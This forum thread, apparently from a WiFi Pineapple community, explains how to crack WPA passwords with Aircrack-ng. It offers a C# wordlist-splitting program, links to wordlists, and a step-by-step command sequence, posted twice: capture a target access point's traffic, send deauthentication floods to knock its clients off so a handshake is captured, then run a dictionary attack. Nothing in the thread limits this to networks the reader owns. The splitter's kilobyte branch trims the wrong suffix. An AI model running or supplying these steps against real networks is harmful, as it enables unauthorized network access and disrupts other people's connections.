Jump to content

How to use Aircrack on pineapple?


reaper_666

Recommended Posts

I don't see how to post attachments, so I cannot post my word doc with pictures on this website. The Aircrack-ng documentation will have to suffice.

http://www.aircrack-ng.org/doku.php?id=cracking_wpa

You will need a wordlist which you will have to get elsewhere. I think I got mine here:

http://www.renderlab.net/projects/WPA-tables/

There is also a bug in Aircrack-ng 1.1 (on pineapple) suite that does not allow for wordlists larger than 2 GB, so you will need to break up the wordlists into about 1900MB chunks. I wrote a C# program to do that, but If you use the C# program you will have to use special software to be able to access linux file systems on Windows. If somebody could write in C?

/*Author: overwraith*/
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.IO;

namespace SplitFile {

    class Program {

        static void Main(string[] args) {
            //-f "E:\Super-WPA" -s "1900M" -d "E:\Wordlists"
            String usage = "SplitFile.exe -f <fileToSplit> -s <size(G/M/K/B)> -d destination";
            String fname = null;
            long byteSize = 0;
            String destination = "";
            
            {//set up command line arguments
                if(args.Length == 0){
                    Console.WriteLine(usage);
                    Environment.Exit(0);
                }

                for (int i = 0; i < args.Length; i++) {
                    if (args[i] == "-f") {//file
                        fname = args[i + 1];
                    }
                    else if (args[i] == "-s") {//size
                        String str = args[i + 1];

                        if (str.EndsWith("G")) {//Gigabytes
                            long.TryParse(str.TrimEnd('G'), out byteSize);
                            byteSize *= 1024 * 1024 * 1024;
                        }
                        else if (str.EndsWith("M")) {//Megabytes
                            long.TryParse(str.TrimEnd('M'), out byteSize);
                            byteSize *= 1024 * 1024;
                        }
                        else if (str.EndsWith("K")) {//Kilobytes
                            long.TryParse(str.TrimEnd('M'), out byteSize);
                            byteSize *= 1024;
                        }
                        else {//bytes
                            if (str.EndsWith("B"))
                                long.TryParse(str.TrimEnd('B'), out byteSize);
                            else
                                long.TryParse(str, out byteSize);
                        }
                    }
                    else if (args[i] == "-d")//destination
                        destination = args[i + 1];
                }//end loop
            }

            Console.WriteLine("\t\t***Partitioning file***");
            Console.WriteLine("Target File: " + fname);
            Console.WriteLine("Partition Sizes: " + byteSize);
            Console.WriteLine("Destination: " + destination + "\n");

            {//write the new partitions
                StreamReader reader = new StreamReader(
                    new BufferedStream(new FileStream(fname, FileMode.Open, FileAccess.Read)));
                String password = null;
                long counter = 0;
                int i = 1;

                while (true) {
                    String partition = destination + "\\" + Path.GetFileName(fname) + i.ToString("D2");
                    StreamWriter writer = new StreamWriter(new BufferedStream(new FileStream(partition, FileMode.Create, FileAccess.Write)));

                    Console.WriteLine("Writing new file: " + partition);

                    //set newline to only "\n", not "\n\r"
                    writer.NewLine = "\n";

                    //write the password caught in-between streams
                    if (password != null) {
                        counter += password.Length;
                        writer.WriteLine(password);
                    }

                    while (( password = reader.ReadLine() ) != null) {
                        //ASCII chars are 1 byte

                        //if combined value is greater than limit, then break and get a new stream
                        if (counter + password.Length + 1 >= byteSize) {
                            //close file
                            writer.Close();

                            //reset counter
                            counter = 0;
                            break;
                        }

                        //accumulate the length
                        counter += password.Length + 1;

                        //write the password
                        writer.WriteLine(password);
                    }//end loop

                    if (password == null)
                        break;

                    i++;
                }//end loop
            }

        }//end main

    }//end class

}//end namespace

The software I used to access Linux file systems on Windows is:

http://www.ext2fsd.com/

You should actually move the actual cracking operation onto a desktop computer, because the pineapple is a little lacking in processing power.

Also, I do not have the benefit of having enough hardware for a Linux box at the moment, but you should plan on making a Linux laptop, or something. Probably Kali Linux. Others might have a better procedure in mind.

Edited by overwraith
Link to comment
Share on other sites

Aircrack-ng 1.1 already installed on the pineapple, is just an old version.

Note that AP stands for access point, and MAC is the media access control address, and when I say <something> I want you to fill in something without the <> symbols.

#Turn on injection radio
ifconfig wlan1 up
#Use this to check
ifconfig

#turn off airmon if is already on
airmon-ng stop wlan1
#turn on airmon, provide it with wlan1
airmon-ng start wlan1

#scan APs in the area
#note the channel of the AP you want to attack, and MAC address
iwlist wlan0 scan

#turn on airodump
airodump-ng -c <channel no> --bssid <MAC address> -w <dump file without extension> wlan1
...
#A nifty screen appears, if no stations present, pack up and try again tomorrow, need populated APs to collect handshake

#open another terminal connection to the pineapple, and start deauthing some of the clients you noted in the airodump screen
#Do this to about 3 clients if you can, the 100 count will keep deauthing them for a while, only deauth as much as you need
#I found that I had to deauth more because my AP and the clients ignore a number of deauths.
aireplay-ng -0 100 -a <AP MAC> -c <Client MAC>

#back on the airodump screen there should be a WPA handshake hash that appears on top right hand side of the screen
#kill the program after you get the handshake, it has done it's job

#finally the cracking process begins
aircrack-ng -w <wordlist> -b <MAC address AP> <capfile.cap>
#a screen with current passphrase, and master key, transient key, and Eapol Hmac should appear, will test until finds the right phrase

I have a Windows machine, is so bad, I putty in, you will probably use ssh or something.

Edited by overwraith
Link to comment
Share on other sites

Aircrack-ng 1.1 already installed on the pineapple, is just an old version.

Note that AP stands for access point, and MAC is the media access control address, and when I say <something> I want you to fill in something without the <> symbols.

#Turn on injection radio
ifconfig wlan1 up
#Use this to check
ifconfig

#turn off airmon if is already on
airmon-ng stop wlan1
#turn on airmon, provide it with wlan1
airmon-ng start wlan1

#scan APs in the area
#note the channel of the AP you want to attack, and MAC address
iwlist wlan0 scan

#turn on airodump
airodump-ng -c <channel no> --bssid <MAC address> -w <dump file without extension> wlan1
...
#A nifty screen appears, if no stations present, pack up and try again tomorrow, need populated APs to collect handshake

#open another terminal connection to the pineapple, and start deauthing some of the clients you noted in the airodump screen
#Do this to about 3 clients if you can, the 100 count will keep deauthing them for a while, only deauth as much as you need
#I found that I had to deauth more because my AP and the clients ignore a number of deauths.
aireplay-ng -0 100 -a <AP MAC> -c <Client MAC>

#back on the airodump screen there should be a WPA handshake hash that appears on top right hand side of the screen
#kill the program after you get the handshake, it has done it's job

#finally the cracking process begins
aircrack-ng -w <wordlist> -b <MAC address AP> <capfile.cap>
#a screen with current passphrase, and master key, transient key, and Eapol Hmac should appear, will test until finds the right phrase
I have a Windows machine, is so bad, I putty in, you will probably use ssh or something.
Make sure wlan1 is down, otherwise you cannot channel hop.

Best regards,

Sebkinne

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...